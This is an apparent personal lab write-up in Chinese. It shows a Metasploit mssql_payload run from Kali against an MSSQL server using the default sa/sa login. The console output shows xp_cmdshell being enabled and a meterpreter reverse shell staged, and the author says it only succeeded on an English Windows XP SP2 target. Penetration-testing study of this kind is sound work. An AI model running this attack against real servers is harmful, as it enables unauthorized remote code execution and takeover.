在kali上做metasploit实验,步骤如下:
msf5 exploit(windows/mssql/mssql_payload) > show options Module options (exploit/windows/mssql/mssql_payload): Name Current Setting Required Description ---- --------------- -------- ----------- METHOD cmd yes Which payload delivery method to use (ps, cmd, or old) PASSWORD sa no The password for the specified username RHOSTS 192.168.0.20 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 1433 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption" URIPATH no The URI to use for this exploit (default is random) USERNAME sa no The username to authenticate as USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.22 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(windows/mssql/mssql_payload) > exploit [*] Started reverse TCP handler on 192.168.0.22:4444 [*] 192.168.0.20:1433 - The server may have xp_cmdshell disabled, trying to enable it... [*] 192.168.0.20:1433 - Command Stager progress - 1.47% done (1499/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 2.93% done (2998/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 4.40% done (4497/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 5.86% done (5996/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 7.33% done (7495/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 8.80% done (8994/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 10.26% done (10493/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 11.73% done (11992/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 13.19% done (13491/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 14.66% done (14990/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 16.13% done (16489/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 17.59% done (17988/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 19.06% done (19487/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 20.53% done (20986/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 21.99% done (22485/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 23.46% done (23984/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 24.92% done (25483/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 26.39% done (26982/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 27.86% done (28481/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 29.32% done (29980/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 30.79% done (31479/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 32.25% done (32978/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 33.72% done (34477/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 35.19% done (35976/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 36.65% done (37475/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 38.12% done (38974/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 39.58% done (40473/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 41.05% done (41972/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 42.52% done (43471/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 43.98% done (44970/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 45.45% done (46469/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 46.91% done (47968/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 48.38% done (49467/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 49.85% done (50966/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 51.31% done (52465/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 52.78% done (53964/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 54.24% done (55463/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 55.71% done (56962/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 57.18% done (58461/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 58.64% done (59960/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 60.11% done (61459/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 61.58% done (62958/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 63.04% done (64457/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 64.51% done (65956/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 65.97% done (67455/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 67.44% done (68954/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 68.91% done (70453/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 70.37% done (71952/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 71.84% done (73451/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 73.30% done (74950/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 74.77% done (76449/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 76.24% done (77948/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 77.70% done (79447/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 79.17% done (80946/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 80.63% done (82445/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 82.10% done (83944/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 83.57% done (85443/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 85.03% done (86942/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 86.50% done (88441/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 87.96% done (89940/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 89.43% done (91439/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 90.90% done (92938/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 92.36% done (94437/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 93.83% done (95936/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 95.29% done (97435/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 96.76% done (98934/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 98.19% done (100400/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 99.59% done (101827/102246 bytes) [*] 192.168.0.20:1433 - Command Stager progress - 100.00% done (102246/102246 bytes) [*] Exploit completed, but no session was created. msf5 exploit(windows/mssql/mssql_payload) >
让人闹心的是最后一句话
Exploit completed, but no session was created.
三板斧打完,无法返回shell,我尝试了好多方法,更换靶机操作系统,更换metasploit版本,无论怎么折腾都不行,最后从书上找到答案,靶机要使用windows xp sp2英文版本的,重要事情要说三遍“英文版”、“英文版”、“英文版”。
更换完毕后,果然成功返回了shell。至于其他系统,尤其中文版的,我就不知道怎么搞了。